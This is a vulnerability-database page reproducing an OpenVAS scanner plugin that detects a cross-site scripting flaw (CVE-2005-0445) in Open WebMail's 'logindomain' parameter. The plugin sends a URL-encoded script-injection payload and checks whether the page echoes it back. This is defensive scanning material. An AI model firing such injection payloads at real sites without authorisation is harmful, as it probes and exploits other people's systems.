Lucene search

K
openvasCopyright (C) 2005 George A. TheallOPENVAS:136141256231016463
HistoryNov 03, 2005 - 12:00 a.m.

Open WebMail Logindomain Parameter Cross-Site Scripting Vulnerability

2005-11-0300:00:00
Copyright (C) 2005 George A. Theall
plugins.openvas.org
12

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

6.2

Confidence

High

EPSS

0.006

Percentile

78.3%

The remote webmail server is affected by a cross-site scripting flaw.

The remote host is running at least one instance of Open WebMail that
fails to sufficiently validate user input supplied to the

# SPDX-FileCopyrightText: 2005 George A. Theall
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:openwebmail.acatysmoof:openwebmail";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.16463");
  script_version("2023-08-01T13:29:10+0000");
  script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_cve_id("CVE-2005-0445");
  script_xref(name:"OSVDB", value:"13788");

  script_name("Open WebMail Logindomain Parameter Cross-Site Scripting Vulnerability");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2005 George A. Theall");
  script_family("Web application abuses");
  script_dependencies("openwebmail_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("OpenWebMail/detected");

  script_xref(name:"URL", value:"http://openwebmail.org/openwebmail/download/cert/advisories/SA-05:01.txt");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/12547");

  script_tag(name:"solution", value:"Upgrade to Open WebMail version 2.50 20040212 or later.");
  script_tag(name:"summary", value:"The remote webmail server is affected by a cross-site scripting flaw.

  The remote host is running at least one instance of Open WebMail that
  fails to sufficiently validate user input supplied to the 'logindomain'
  parameter. This failure enables an attacker to run arbitrary script
  code in the context of a user's web browser.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_analysis");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
if( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );
if( dir == "/" ) dir = "";

# We test whether the hole exists by trying to echo magic (urlencoded
# as alt_magic for http) and checking whether we get it back.
magic = "logindomain xss vulnerability";
alt_magic = str_replace( string:magic, find:" ", replace:"%20" );

url = dir + "/openwebmail.pl?logindomain=%22%20/%3E%3Cscript%3Ewindow.alert('" + alt_magic + "')%3C/script%3E";

req = http_get( item:url, port:port );
res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );
if( isnull( res ) ) exit( 0 ); # can't connect

if( res =~ "^HTTP/1\.[01] 200" && egrep( string:res, pattern:magic ) ) {
  report = http_report_vuln_url( port:port, url:url );
  security_message( port:port, data:report );
  exit( 0 );
}

exit( 99 );

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

6.2

Confidence

High

EPSS

0.006

Percentile

78.3%

Related for OPENVAS:136141256231016463